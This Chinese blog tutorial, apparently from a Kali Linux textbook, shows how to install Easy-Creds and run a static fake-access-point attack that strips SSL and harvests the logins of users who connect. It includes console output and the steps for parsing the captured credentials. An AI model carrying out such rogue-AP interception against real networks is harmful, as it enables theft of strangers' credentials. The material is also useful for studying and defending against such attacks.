转载请注明出处:https://blog.csdn.net/l1028386804/article/details/83796584

Easy-Creds是一个菜单式的破解工具。该工具允许用户打开一个无线网卡,并能实现一个无线接入点攻击平台。Easy-Creds可以创建一个欺骗访问点,并作为一个中间人攻击类型运行,进而分析用户的数据流和账户信息。它可以从SSL加密数据中恢复账户。本节将介绍使用Easy-Creds工具攻击无线网络。

Easy-Creds是BackTrack5中的一部分。在Kali中,默认没有安装该工具。所以,需要先安装Easy-Creds工具才可使用。

【实例9-3】安装Easy-Creds工具。具体操作步骤如下所示。

(1)从https://github.com/brav0hax/easy-creds网站下载Easy-Creds软件包,其软件包名为easy-creds-master.zip。

(2)解压下载的软件包。执行命令如下所示:

root@localhost:~# unzip easy-creds-master.zip
Archive: easy-creds-master.zip
bf9f00c08b1e26d8ff44ef27c7bcf59d3122ebcccreating: easy-creds-master/inflating: easy-creds-master/READMEinflating: easy-creds-master/definitions.sslstripinflating: easy-creds-master/easy-creds.shinflating: easy-creds-master/installer.sh

从输出的信息中,可以看到Easy-Creds软件包被解压到easy-creds-master文件中。从以上信息中,可以看到在easy-creds-master文件中有一个installer.sh文件,该文件就是用来安装Easy-Creds软件包的。

(3)安装Easy-Creds软件包。在安装Easy-Creds软件包之前,有一些依赖包需要安装。这些依赖包,可以参考easy-creds-master文件中的README文件安装相关的依赖包。然后,安装Easy-Creds包。执行命令如下所示:

root@kali:~# cd easy-creds/
root@kali:~/easy-creds# ./installer.sh
____ ____ ____ ____ ____ ____ ____ ____ ____ ____
||e|||a |||s |||y |||- |||c |||r |||e |||d |||s ||
||__|||__|||__|||__|||__|||__|||__|||__|||__|||__||
|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|Version 3.7 - Garden of Your MindInstaller
Please choose your OS to install easy-creds
1\. Debian/Ubuntu and derivatives
2\. Red Hat or Fedora
3\. Microsoft Windows
4\. Exit
Choice:

以上信息显示了,安装easy-creds的操作系统菜单。

(4)这里选择安装到Debian/Ubuntu,输入编号1,将显示如下所示的信息:

Choice: 1
____ ____ ____ ____ ____ ____ ____ ____ ____ ____
||e |||a |||s |||y |||- |||c |||r |||e |||d |||s ||
||__|||__|||__|||__|||__|||__|||__|||__|||__|||__||
|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|Version 3.7 - Garden of Your MindInstaller
Please provide the path you'd like to place the easy-creds folder. [/opt] :   #选择安装位置,本例中使用默认设置
[*] Installing pre-reqs for Debian/Ubuntu…
[*] Running 'updatedb'
[-] cmake is not installed, will attempt to install…[+] cmake was successfully installed from the repository.
[+] I found gcc installed on your system
[+] I found g++ installed on your system
[+] I found subversion installed on your system
[+] I found wget installed on your system
[+] I found libssl-dev installed on your system
[+] I found libpcap0.8 installed on your system
[+] I found libpcap0.8-dev installed on your system
[+] I found libssl-dev installed on your system
[+] I found aircrack-ng installed on your system
[+] I found xterm installed on your system
[+] I found sslstrip installed on your system
[+] I found ettercap installed on your system
[+] I found hamster installed on your system
[-] ferret is not installed, will attempt to install…
[*] Downloading and installing ferret from SVN
……
[*] Installing the patched freeradius server…
……
make[4]: Leaving directory `/tmp/ec-install/freeradius-server-2.1.11/doc/rfc'
make[3]: Leaving directory `/tmp/ec-install/freeradius-server-2.1.11/doc'
make[2]: Leaving directory `/tmp/ec-install/freeradius-server-2.1.11/doc'
make[1]: Leaving directory `/tmp/ec-install/freeradius-server-2.1.11'
[+] The patched freeradius server has been installed
[+] I found asleap installed on your system
[+] I found metasploit installed on your system
[*] Running 'updatedb' again because we installed some new stuff
…happy hunting!

以上信息显示了安装Easy-Creds包的详细过程。在该过程中,会检测easy-creds的依赖包是否都已安装。如果没有安装,此过程中会安装。Easy-Creds软件包安装完成后,将显示happy hunting!信息。

【实例9-4】使用Easy-Creds工具破解无线网络。具体操作步骤如下所示。

(1)启动Easy-Creds工具。执行命令如下所示:

root@localhost:~/easy-creds-master#./easy-creds.sh
____ ____ ____ ____ ____ ____ ____ ____ ____ ____
||e |||a |||s |||y |||- |||c |||r |||e |||d |||s ||
||__|||__|||__|||__|||__|||__|||__|||__|||__|||__||
|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|Version 3.8-dev - Garden of New Jersey
At any time, ctrl+c to cancel and return to the main menu
1\. Prerequisites & Configurations
2\. Poisoning Attacks
3\. FakeAP Attacks
4\. Data Review
5\. Exit
q. Quit current poisoning session
Choice:

以上输出的信息显示了Easy-Creds工具的攻击菜单。

(2)这里选择伪AP攻击,输入编号3。将显示如下所示的信息:

Choice: 3
____ ____ ____ ____ ____ ____ ____ ____ ____ ____
||e |||a |||s |||y |||- |||c |||r |||e |||d |||s ||
||__|||__|||__|||__|||__|||__|||__|||__|||__|||__||
|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|Version 3.8-dev - Garden of New Jersey
At any time, ctrl+c to cancel and return to the main menu
1\. FakeAP Attack Static
2\. FakeAP Attack EvilTwin
3\. Karmetasploit Attack
4\. FreeRadius Attack
5\. DoS AP Options
6\. Previous Menu
Choice:

以上输出信息显示了伪AP攻击可使用的方法。

(3)这里选择使用静态伪AP攻击,输入编号1。将显示如下所示的信息:

设置完以上的信息后,将会自动启动一些程序。几秒后,将会打开几个有效窗口,如图9.34所示

图9.34 有效的窗口

(4)当有用户连接Wifi接入点时,Easy-Creds将自动给客户端分配一个IP地址,并且能够访问互联网。如果在互联网上访问一个安全网址时,该工具将除去SSL并删除安全连接并在后台运行。所以,能够读取到客户端登录某个网站的用户名和密码。如图9.34所示,捕获到一个登录http://www.live.com网站的用户名和密码。其用户名为test@live.com,密码为qwert。

(5)此时在Easy-Creds的主菜单中选择数据恢复,输入编号4,如下所示:

At any time, ctrl+c to cancel and return to the main menu
1\. Prerequisites & Configurations
2\. Poisoning Attacks
3\. FakeAP Attacks
4\. Data Review
5\. Exit
q. Quit current poisoning session
Choice: 4

(6)选择数据恢复后,将显示如下所示的信息:

____ ____ ____ ____ ____ ____ ____ ____ ____ ____
||e |||a |||s |||y |||- |||c |||r |||e |||d |||s ||
||__|||__|||__|||__|||__|||__|||__|||__|||__|||__||
|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|Version 3.8-dev - Garden of New Jersey
At any time, ctrl+c to cancel and return to the main menu
1\. Parse SSLStrip log for credentials
2\. Parse dsniff file for credentials
3\. Parse ettercap eci file for credentials
4\. Parse freeradius attack file for credentials
5\. Previous Menu
Choice: 3

以上信息显示了可用证书的方法。

(7)这里选择分析Ettercap eci文件,输入编号3,将显示如下所示的信息:

||e |||a |||s |||y |||- |||c |||r |||e |||d |||s ||
||__|||__|||__|||__|||__|||__|||__|||__|||__|||__||
|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|Version 3.8-dev - Garden of New Jersey
At any time, ctrl+c to cancel and return to the main menu
Ettercap logs in current log folder:
/root/easy-creds-master/easy-creds-2018-11-07-1722/ettercap2018-11-07-1724.eci
Enter the full path to your ettercap.eci log file:

从输出信息中,可以看到Ettercap日志文件的保存位置。

(8)此时输入ettercap.eci日志文件的全路径。这里只需要通过复制并粘贴提供的整个Ettercap路径就可以了。如下所示:

Enter the full path to your ettercap.eci log file: /root/easy-creds-master/easy-creds-2018-11-07-1722/ettercap2014-07-24-1724.eci

输入以下路径后,将显示如图9.35所示的界面

图9.35 恢复的数据

(9)从该界面可以清楚的看到,截获的客户端用户信息及登录的网站。

Kali之——使用Easy-Creds工具攻击无线网络相关推荐

  1. 如何使用Aircrack-ng工具破解无线网络(kali 使用RT3070L芯片Ralink 802.11 n网卡破解WPA/WPA2无线网络)

    目录 一.购买无线网卡 二.插上无线网卡 三.连接我们的无线网卡​编辑 四.可移动设备没有出现网卡信息 五.windows无法启动VMware USB Arbitration Service服务 六. ...

  2. 无线网络渗透测试-使用Aircrack-ng工具破解无线网络

    破解WEP加密的无线网络 Wired Equivalent Privacy或WEP(有线等效加密)协议是对在两台设备间无线传输的数据进行加密的方式,用以防止非法用户窃听或侵入无线网络.不过密码分析学家 ...

  3. Kali-linux使用Aircrack-ng工具破解无线网络

    Aircrack-ng是一款基于破解无线802.11协议的WEP及WPA-PSK加密的工具.该工具主要用了两种攻击方式进行WEP破解.一种是FMS攻击,该攻击方式是以发现该WEP漏洞的研究人员名字(S ...

  4. linux无线命令管理工具,Linux无线网络实用工具Top 10

    我曾经花费大量的时间对无线网络进行研究.在连接无线接入点的时间,对如何选择合适的应用工具起决定性作用的是我使用的Linux发行版本和硬件设备的情况.在这些工具当中,有一些是可以单独使用的.也有一些是和 ...

  5. 使用Aircrack-ng工具破解WEP、WPA/WPA2加密的无线网络

    特别声明:本文是参照"9.2 使用Aircrack-ng工具破解无线网络"进行实验的.链接为:https://wizardforcel.gitbooks.io/daxueba-ka ...

  6. 带你了解无线网络渗透测试——无线网络嗅探工具Kismet

    如果要进行无线网络渗透测试,则必须先扫描所有有效的无线接入点.刚好在Kali Linux中,提供了一款嗅探无线网络工具Kismet.使用该工具可以测量周围的无线信号,并查看所有可用的无线接入点.本节将 ...

  7. ​Kali-linux无线网络嗅探工具Kismet​

    如果要进行无线网络渗透测试,则必须先扫描所有有效的无线接入点.刚好在Kali Linux中,提供了一款嗅探无线网络工具Kismet.使用该工具可以测量周围的无线信号,并查看所有可用的无线接入点.本节将 ...

  8. kali 系列学习12-使用Wifite破解无线网络

    一些破解无线网络程序是使用Aircrack-ng工具集,并添加了一个图形界面或使用文本菜单的形式来破解无线网络.这使得用户使用它们更容易,而且不需要记住任何命令.本节将介绍使用命令行工具Wifite, ...

  9. Kali-linux无线网络嗅探工具Kismet

    如果要进行无线网络渗透测试,则必须先扫描所有有效的无线接入点.刚好在Kali Linux中,提供了一款嗅探无线网络工具Kismet.使用该工具可以测量周围的无线信号,并查看所有可用的无线接入点.本节将 ...

最新文章

  1. 14/10/校内测试{天天考,丧心病狂}
  2. 六一:如何在Datawhale开源学习小程序中管
  3. Hystrix入门指南
  4. Spark RDD并行度与分区设置
  5. boost::geometry::topological_dimension用法的测试程序
  6. ASP.NET Core中Ocelot的使用:基于服务发现的负载均衡
  7. java 中允许键重复的,二叉搜索树的定义是否允许重复键?
  8. 【codeforces】Codeforces Round #277 (Div. 2) 解读
  9. 影响程序运行速度的几个因素
  10. Entity Framework 无法加载指定的元数据资源。
  11. ZOJ 1010. Area 解题报告
  12. python如何跳出函数_python如何跳出函数
  13. 计算机潮流计算代码,潮流计算代码c++.doc
  14. DTFT和DFT有何区别?一文为你讲解清楚
  15. python 游戏编程app_娱教于乐!四大游戏类编程网站,学Python再也不枯燥无味了...
  16. 进击的拼多多,淘宝如何应对
  17. pos共识机制_PoW与PoS共识机制的优缺点介绍
  18. android+桌面组件开发,android——桌面组件的开发
  19. Latex 中导入visio画的图片,去除多余留白
  20. 我的Url重写,我的UrlRewriting

热门文章

  1. 詹姆斯高斯林_詹姆斯·高斯林(James Gosling)警告《银翼杀手》的未来
  2. linux,windows 可执行文件(ELF、PE)
  3. java心跳 谁发谁_java 心跳机制
  4. 【学习历程】05 安装大数据集群前的环境准备
  5. 如何下载jdk源码、hotspot源码
  6. 修炼内功---数据结构与算法12---快速排序
  7. 狂奔与内卷并存,自嗨锅、莫小仙们如何寻找“破局之道”?
  8. Cesium图元管理和事件处理
  9. 语言环境设置命令locale 命令(linux,对应于window 7(win叫什么命令?)控制面板-区域和语言里的设置)
  10. Linux中的buff/cache内存